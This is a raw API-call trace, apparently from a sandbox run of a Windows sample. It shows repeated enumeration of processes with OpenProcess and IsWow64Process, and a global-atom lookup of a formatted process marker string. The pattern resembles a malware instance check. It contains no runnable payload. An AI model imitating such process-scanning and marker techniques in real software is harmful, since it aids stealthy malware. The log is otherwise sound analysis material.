	[0104.156] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0104.156] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0104.156] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0104.156] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0104.156] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0104.156] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0104.156] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0104.157] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0104.157] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0104.157] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0104.157] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0104.157] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0104.157] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0104.158] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0104.158] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0104.158] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x694
	[0104.158] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.159] CloseHandle (hObject=0x694) returned 1
	[0104.159] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0104.159] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0104.159] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x694
	[0104.159] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.159] CloseHandle (hObject=0x694) returned 1
	[0104.159] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0104.159] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x694
	[0104.160] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.160] CloseHandle (hObject=0x694) returned 1
	[0104.160] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x694
	[0104.160] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.160] CloseHandle (hObject=0x694) returned 1
	[0104.160] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x694
	[0104.160] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.160] CloseHandle (hObject=0x694) returned 1
	[0104.160] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x694
	[0104.160] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.160] CloseHandle (hObject=0x694) returned 1
	[0104.160] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x694
	[0104.161] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.161] CloseHandle (hObject=0x694) returned 1
	[0104.161] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x694
	[0104.161] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.161] CloseHandle (hObject=0x694) returned 1
	[0104.161] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0104.161] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x694
	[0104.161] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.161] CloseHandle (hObject=0x694) returned 1
	[0104.161] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x694
	[0104.161] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.161] CloseHandle (hObject=0x694) returned 1
	[0104.161] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x694
	[0104.162] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.162] CloseHandle (hObject=0x694) returned 1
	[0104.162] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x694
	[0104.162] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.162] CloseHandle (hObject=0x694) returned 1
	[0104.162] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x694
	[0104.162] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.162] CloseHandle (hObject=0x694) returned 1
	[0104.162] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x694
	[0104.162] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.162] CloseHandle (hObject=0x694) returned 1
	[0104.162] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x694
	[0104.162] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.163] CloseHandle (hObject=0x694) returned 1
	[0104.163] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x694
	[0104.163] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.163] CloseHandle (hObject=0x694) returned 1
	[0104.163] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x694
	[0104.163] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.163] CloseHandle (hObject=0x694) returned 1
	[0104.163] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x694
	[0104.163] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.163] CloseHandle (hObject=0x694) returned 1
	[0104.163] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x694
	[0104.163] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.163] CloseHandle (hObject=0x694) returned 1
	[0104.163] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x694
	[0104.164] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.164] CloseHandle (hObject=0x694) returned 1
	[0104.164] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x694
	[0104.164] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.164] CloseHandle (hObject=0x694) returned 1
	[0104.164] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x694
	[0104.164] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.164] CloseHandle (hObject=0x694) returned 1
	[0104.164] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x694
	[0104.164] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.164] CloseHandle (hObject=0x694) returned 1
	[0104.164] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x694
	[0104.164] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.164] CloseHandle (hObject=0x694) returned 1
	[0104.165] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x694
	[0104.165] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.165] CloseHandle (hObject=0x694) returned 1
	[0104.165] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x694
	[0104.165] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.165] CloseHandle (hObject=0x694) returned 1
	[0104.165] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x694
	[0104.165] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.165] CloseHandle (hObject=0x694) returned 1
	[0104.165] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x694
	[0104.165] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.165] CloseHandle (hObject=0x694) returned 1
	[0104.165] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x694
	[0104.165] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.166] CloseHandle (hObject=0x694) returned 1
	[0104.166] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x694
	[0104.166] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.166] CloseHandle (hObject=0x694) returned 1
	[0104.166] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0104.166] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.166] CloseHandle (hObject=0x694) returned 1
	[0104.166] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0104.166] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0104.167] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0104.167] GetProcessTimes (in: hProcess=0x694, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0104.167] wsprintfA (in: param_1=0x3993d58, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0104.167] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0104.167] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0104.167] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0104.168] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0104.168] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0104.168] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0104.168] CloseHandle (hObject=0x694) returned 1
	[0104.168] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0104.168] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x694
	[0104.168] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.168] CloseHandle (hObject=0x694) returned 1
	[0104.168] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x694
	[0104.169] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.169] CloseHandle (hObject=0x694) returned 1
	[0104.169] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x694
	[0104.169] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.169] CloseHandle (hObject=0x694) returned 1
	[0104.201] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0104.201] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0104.202] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0104.202] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0104.202] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0104.202] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0104.202] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0104.202] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0104.202] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0104.203] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0104.203] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0104.203] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0104.203] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0104.203] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0104.203] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0104.203] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0104.204] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0104.204] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0104.204] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x694
	[0104.204] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.204] CloseHandle (hObject=0x694) returned 1
	[0104.204] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0104.204] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0104.204] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x694
	[0104.204] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.204] CloseHandle (hObject=0x694) returned 1
	[0104.204] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0104.205] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x694
	[0104.205] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.205] CloseHandle (hObject=0x694) returned 1
	[0104.205] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x694
	[0104.205] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.205] CloseHandle (hObject=0x694) returned 1
	[0104.205] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x694
	[0104.205] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.205] CloseHandle (hObject=0x694) returned 1
	[0104.205] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x694
	[0104.205] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.205] CloseHandle (hObject=0x694) returned 1
	[0104.205] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x694
	[0104.205] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.206] CloseHandle (hObject=0x694) returned 1
	[0104.206] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x694
	[0104.206] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.206] CloseHandle (hObject=0x694) returned 1
	[0104.206] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0104.206] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x694
	[0104.206] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.206] CloseHandle (hObject=0x694) returned 1
	[0104.206] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x694
	[0104.206] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.206] CloseHandle (hObject=0x694) returned 1
	[0104.206] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x694
	[0104.206] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.207] CloseHandle (hObject=0x694) returned 1
	[0104.207] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x694
	[0104.207] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.207] CloseHandle (hObject=0x694) returned 1
	[0104.207] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x694
	[0104.207] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.207] CloseHandle (hObject=0x694) returned 1
	[0104.207] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x694
	[0104.207] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.207] CloseHandle (hObject=0x694) returned 1
	[0104.207] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x694
	[0104.207] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.207] CloseHandle (hObject=0x694) returned 1
	[0104.207] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x694
	[0104.207] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.207] CloseHandle (hObject=0x694) returned 1
	[0104.208] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x694
	[0104.208] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.208] CloseHandle (hObject=0x694) returned 1
	[0104.208] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x694
	[0104.208] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.208] CloseHandle (hObject=0x694) returned 1
	[0104.208] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x694
	[0104.208] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.209] CloseHandle (hObject=0x694) returned 1
	[0104.209] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x694
	[0104.209] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.209] CloseHandle (hObject=0x694) returned 1
	[0104.209] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x694
	[0104.209] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.209] CloseHandle (hObject=0x694) returned 1
	[0104.209] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x694
	[0104.209] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.209] CloseHandle (hObject=0x694) returned 1
	[0104.209] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x694
	[0104.209] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.209] CloseHandle (hObject=0x694) returned 1
	[0104.209] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x694
	[0104.210] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.210] CloseHandle (hObject=0x694) returned 1
	[0104.210] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x694
	[0104.210] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.210] CloseHandle (hObject=0x694) returned 1
	[0104.210] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x694
	[0104.210] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.210] CloseHandle (hObject=0x694) returned 1
	[0104.210] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x694
	[0104.210] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.210] CloseHandle (hObject=0x694) returned 1
	[0104.210] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x694
	[0104.210] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.210] CloseHandle (hObject=0x694) returned 1
	[0104.210] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x694
	[0104.211] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.211] CloseHandle (hObject=0x694) returned 1
	[0104.211] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x694
	[0104.211] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.211] CloseHandle (hObject=0x694) returned 1
	[0104.211] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0104.211] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.211] CloseHandle (hObject=0x694) returned 1
	[0104.211] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0104.211] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0104.212] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0104.212] GetProcessTimes (in: hProcess=0x694, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0104.212] wsprintfA (in: param_1=0x39937e0, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0104.212] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0104.212] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0104.212] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0104.213] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0104.213] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0104.213] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0104.213] CloseHandle (hObject=0x694) returned 1
	[0104.213] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0104.213] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x694
	[0104.213] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.213] CloseHandle (hObject=0x694) returned 1
	[0104.213] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x694
	[0104.213] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.213] CloseHandle (hObject=0x694) returned 1
	[0104.214] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x694
	[0104.214] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.214] CloseHandle (hObject=0x694) returned 1
	[0104.246] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0104.246] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0104.246] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0104.246] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0104.246] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0104.247] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0104.247] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0104.247] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0104.247] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0104.247] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0104.247] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0104.247] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0104.247] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0104.248] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0104.248] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0104.248] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0104.248] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0104.248] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0104.249] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x694
	[0104.249] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.249] CloseHandle (hObject=0x694) returned 1
	[0104.249] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
